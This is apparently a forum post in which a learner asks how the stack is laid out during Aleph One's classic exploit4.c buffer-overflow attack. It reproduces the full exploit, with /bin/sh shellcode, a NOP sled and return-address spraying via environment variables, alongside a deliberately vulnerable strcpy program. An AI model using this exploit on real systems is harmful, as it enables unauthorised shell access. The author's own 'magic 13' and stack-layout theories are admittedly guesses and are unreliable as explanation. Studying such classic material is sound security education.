Recently, I have been reading as many buffer overflow texts as I could
get my hands on. I studied every C construct and every word as if each
were equally important, and as a result I now know quite a bit about
buffer overflows. BUT, there is a problem.
In AlephOne's "Smashing the Stack for Fun and Profit" (Phrack 49, File
14), there is an example of a general exploit called "exploit4.c". It
sets up an environment variable named "RET" that contains nothing but
repeated copies of the address where the shellcode (and NOPs) should
be. The shellcode (and NOPs) are placed in an environment variable
named "EGG". "EGG" is created first, then "RET". Then the program
starts a shell, "/bin/bash" (to set up the environment for the general
exploit). My question is, what happens EXACTLY after bash is called?
Here's my theory, so you know how much depth I want:
Once a program is called, the kernel allocates a new stack where all of
the environment variables are placed, including "EGG" and "RET". Next,
you call your vulnerable program with the argument that will overflow
the buffer (e.g. "simple $RET"). The stack now looks like THIS:
simple ---> [data] [buffer] [sfp] [ret] [argc] [argvp] [envp] [data]
            [argvs] [envs] [data]
|||
bash ---> [data] [sfp] [ret] [argc] [argvp] [envp] [data]
          [argvs] [envs <<$EGG is here>>] [data]
|||
exploit4 ---> [data] [sfp] [ret] [argc] [argvp] [envp] [data]
              [argvs] [envs] [data]
...
[[if the above wraps badly when posted, it might be easier to write it
down on paper]]
where "|||" is just a separator, "sfp" is the saved frame pointer, "ret"
is the saved IP (Instruction Pointer), i.e. the point execution returns
to when the program is finished, "argc" is obvious, "argvp" is the
pointer to the "argvs" (argv strings), "envp" is the pointer to the
"envs" (environment strings), and "data" is majikal stuff that I have no
idea about.
NOTE: the "simple" program is at the top of the stack.
The reason exploit4 works is that it uses the esp of exploit4, and
$EGG must lie in that area if it is big enough. The esp for exploit4 is
in between the separator and data for the exploit4 stack.
My theory stops there, incomplete, because the data right before the
separator of exploit4 is blocking $EGG from using exploit4's esp!
But another theory is that data for exploit4 is put somewhere else, so
data for bash can go in its place. THEN, $EGG can be in esp's path.
OR, bash doesn't get involved like this, and it's just simple that is
right after exploit4.
<shrug>
Here's exploit4.c and simple.c:
exploit4.c
----
/*
Written by AlephOne. Published in Phrack49's 14th file named "Smashing
the Stack for Fun and Profit".
This file has been modified.
Modified DEFAULT_BUFFER_SIZE to 6049. The default is 512.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 6049
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90

char shellcode[] =
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

/* Leaves the current stack pointer in %eax, the i386 return register. */
unsigned long get_esp(void) {
  __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[]) {
  char *buff, *ptr, *egg;
  long *addr_ptr, addr;
  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
  int i, eggsize=DEFAULT_EGG_SIZE;

  /* Optional arguments: buffer size, offset, egg size. */
  if (argc > 1) bsize = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);
  if (argc > 3) eggsize = atoi(argv[3]);

  if (!(buff = malloc(bsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }
  if (!(egg = malloc(eggsize))) {
    printf("Can't allocate memory.\n");
    exit(0);
  }

  addr = get_esp() - offset;
  printf("Using address: 0x%lx\n", addr);

  /* Fill buff with copies of the guessed address. Stopping before a
     partial last word keeps a bsize that is not a multiple of 4 (such
     as 6049) from writing past the allocation. */
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i + 4 <= bsize; i+=4)
    *(addr_ptr++) = addr;

  /* Fill egg with NOPs, then the shellcode at the end. */
  ptr = egg;
  for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
    *(ptr++) = NOP;
  for (i = 0; i < strlen(shellcode); i++)
    *(ptr++) = shellcode[i];

  buff[bsize - 1] = '\0';
  egg[eggsize - 1] = '\0';

  /* The variable names overwrite the first 4 bytes of each buffer. */
  memcpy(egg,"EGG=",4);
  putenv(egg);
  memcpy(buff,"RET=",4);
  putenv(buff);
  system("/bin/bash");
  return 0;
}
simple.c
----
/*
Set your overflow buffer to 6049 bytes.
*/
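#include <string.h>

void function(char *temp)
{
  char buffer1[5001];
  int *seven;
  char *nine;
  char s[1024];

  strcpy(s, temp);   /* no bounds check: this is the overflow */
}

int main(int argc, char *argv[])
{
  function(argv[1]);
  return 0;
}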
NOTE: in exploit4.c I changed DEFAULT_BUFFER_SIZE to the EXACT size
needed to overflow simple's buffer. It's EXACT. You can't get any
better. Hehehe. Here's how to find the exact buffer size:
Find the size in bytes of each variable.
buffer1 = 5001
seven = 4
nine = 4
s = 1024
Then look at EACH variable and see if its size is divisible by four. If
it isn't, add bytes until it is. The reason the sizes have to be
divisible by four is explained in AlephOne's article.
So:
buffer1 = 5004
seven = 4
nine = 4
s = 1024
Add 'em up: 6036. Then add 13 (the magic value): 6049.
I'll post an in-depth explanation on this later. Right now, I'm still
finding out the EXACT reason for the magic value of 13. My theory is
this:
[buffer]  [sfp]    [ret]    [data]
^         ^        ^        ^
|         |        |        |
0x0       0x1794   0x1798   0x179c
buffer is 6036 bytes.
sfp is 4 bytes.
ret is 4 bytes.
data doesn't matter.
You'd think it would be 6036+8 (6044 [0x179c]), wouldn't you? BUT, I
think that when you put data in a memory location, you have to stick in
4 bytes FIRST, so in reality the END of ret is actually at 6036+12
(6048 [0x17a0]).
When I say you have to stick in 4 bytes first, I mean that you have to
stick four bytes into 0x0, for example, before you can find out the
four-byte (word) data that is in 0x0.
Now, it's -13- because you have to NUL-terminate the overflow string.
Anyway, it doesn't make too much sense to me right now, so keep in mind
this is just a -thought-. If I knew anything about memory addressing on
the i386 I would know for sure, so I welcome -any- comments. Note, I've
tested this quite a bit, so I can pretty much say that if you add 13
you will get the EXACT buffer size. Try different ones and see for
yourself (make it lower and you'll get errors, make it higher and it
works).